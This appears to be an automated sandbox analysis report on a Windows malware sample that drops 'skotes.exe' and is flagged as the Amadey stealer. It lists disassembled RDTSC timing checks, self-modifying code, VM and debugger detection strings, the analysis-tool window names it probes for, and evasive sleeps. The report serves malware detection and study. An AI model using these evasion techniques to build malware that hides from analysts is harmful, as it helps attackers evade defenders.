Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90DC3 second address: 4E90E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD0F8E1A7B0h 0x0000000f push eax 0x00000010 jmp 00007FD0F8E1A7ABh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD0F8E1A7B4h 0x0000001d and cx, 1A38h 0x00000022 jmp 00007FD0F8E1A7ABh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FD0F8E1A7ABh 0x00000032 sub eax, 3153E7FEh 0x00000038 jmp 00007FD0F8E1A7B9h 0x0000003d popfd 0x0000003e movzx eax, bx 0x00000041 popad 0x00000042 pop ebp 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FD0F8E1A7B9h 0x0000004a sbb ax, FCE6h 0x0000004f jmp 00007FD0F8E1A7B1h 0x00000054 popfd 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90B53 second address: 4E90B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90B68 second address: 4E90B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90B8D second address: 4E90B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90B9D second address: 4E90C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD0F8E1A7B9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FD0F8E1A7AEh 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007FD0F8E1A7AEh 0x0000001f push eax 0x00000020 pushfd 0x00000021 jmp 00007FD0F8E1A7B1h 0x00000026 xor eax, 2C040436h 0x0000002c jmp 00007FD0F8E1A7B1h 0x00000031 popfd 0x00000032 pop eax 0x00000033 popad 0x00000034 pop ebp 0x00000035 pushad 0x00000036 movsx edi, cx 0x00000039 push eax 0x0000003a push edx 0x0000003b call 00007FD0F8E1A7B4h 0x00000040 pop esi 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10D65 second address: 4F10D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10D6B second address: 4F10D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, di 0x0000000d mov ch, dl 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD0F8E1A7ACh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10D90 second address: 4F10DAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10DAD second address: 4F10DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10DBD second address: 4F10DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F101BA second address: 4F101BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F101BE second address: 4F101D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F101D3 second address: 4F101E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F101E3 second address: 4F101E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10045 second address: 4F100C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushfd 0x0000000e jmp 00007FD0F8E1A7B8h 0x00000013 add esi, 7D1878D8h 0x00000019 jmp 00007FD0F8E1A7ABh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B2h 0x00000029 xor esi, 55C14338h 0x0000002f jmp 00007FD0F8E1A7ABh 0x00000034 popfd 0x00000035 push esi 0x00000036 pop edi 0x00000037 popad 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b pushad 0x0000003c mov bx, 73B2h 0x00000040 push eax 0x00000041 push edx 0x00000042 mov ebx, 447C22ACh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0101 second address: 4EA0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD0F8CDABEEh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD0F8CDABEDh 0x0000001a and al, 00000036h 0x0000001d jmp 00007FD0F8CDABF1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FD0F8CDABF0h 0x00000029 or ecx, 07E63F58h 0x0000002f jmp 00007FD0F8CDABEBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0172 second address: 4EA018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA018A second address: 4EA018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1042B second address: 4F10465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8E1A7B8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10465 second address: 4F10469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10469 second address: 4F1046F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1046F second address: 4F104BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD0F8CDABF5h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD0F8CDABECh 0x00000019 sub cx, 7B58h 0x0000001e jmp 00007FD0F8CDABEBh 0x00000023 popfd 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov si, dx 0x0000002f mov cl, bl 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F104BE second address: 4F104FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 jmp 00007FD0F8E1A7B3h 0x0000000e popfd 0x0000000f mov dx, si 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD0F8E1A7ACh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F104FA second address: 4F10509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10509 second address: 4F10521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10521 second address: 4F1054C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8CDABF5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F105CA second address: 4F105D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F105D0 second address: 4F105E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F105E3 second address: 4F105E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F105E9 second address: 4F105ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F105ED second address: 4F105F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F105F1 second address: 4F10600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10600 second address: 4F10604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10604 second address: 4F10608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F10608 second address: 4F1060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1060E second address: 4F10614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB057A second address: 4EB0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB0594 second address: 4EB05AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB05AF second address: 4EB05B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB05B4 second address: 4EB05DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB05DA second address: 4EB05E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB05E0 second address: 4EB05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB05E6 second address: 4EB05EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB05EA second address: 4EB0606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8CDABEEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB0606 second address: 4EB060C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB060C second address: 4EB0630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FD0F8CDABE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB0738 second address: 4EB073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB073E second address: 4EB075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB075B second address: 4EB07C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e jmp 00007FD0F8E1A7ADh 0x00000013 nop 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD0F8E1A7ACh 0x0000001b and ch, 00000058h 0x0000001e jmp 00007FD0F8E1A7ABh 0x00000023 popfd 0x00000024 mov ah, 1Ah 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FD0F8E1A7B0h 0x0000002f sbb ecx, 6F439FB8h 0x00000035 jmp 00007FD0F8E1A7ABh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d mov ax, 8185h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB07C2 second address: 4EB0821 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD0F8CDABF2h 0x00000008 sbb cx, 5A18h 0x0000000d jmp 00007FD0F8CDABEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FD0F8CDABF6h 0x0000001c sub esp, 1Ch 0x0000001f pushad 0x00000020 jmp 00007FD0F8CDABEEh 0x00000025 push eax 0x00000026 mov si, bx 0x00000029 pop edx 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ah, 56h 0x00000031 popad 0x00000032 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 73579F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 796594 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 96579F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9C6594 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04F10566 rdtsc 0_2_04F10566
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1216 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 472 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1208 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1215 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8124 Thread sleep count: 1216 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8124 Thread sleep time: -2433216s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080 Thread sleep count: 472 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080 Thread sleep time: -14160000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 Thread sleep count: 1208 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 Thread sleep time: -2417208s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7176 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 Thread sleep count: 1215 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 Thread sleep time: -2431215s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: skotes.exe, skotes.exe, 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1433845243.00000000011B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1463759755.00000000006EE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1497859902.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1507190175.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04F10566 rdtsc 0_2_04F10566
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0075652B mov eax, dword ptr fs:[00000030h] 5_2_0075652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0075A302 mov eax, dword ptr fs:[00000030h] 5_2_0075A302
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: skotes.exe Binary or memory string: h!Program Manager
Source: file.exe, 00000000.00000002.1463759755.00000000006EE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1497859902.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1507190175.000000000091E000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: h!Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0073D3E2 cpuid 5_2_0073D3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0073CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 5_2_0073CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_007265E0 LookupAccountNameA, 5_2_007265E0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 3.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4f0000.0.unpack, type: UNPACKEDPE
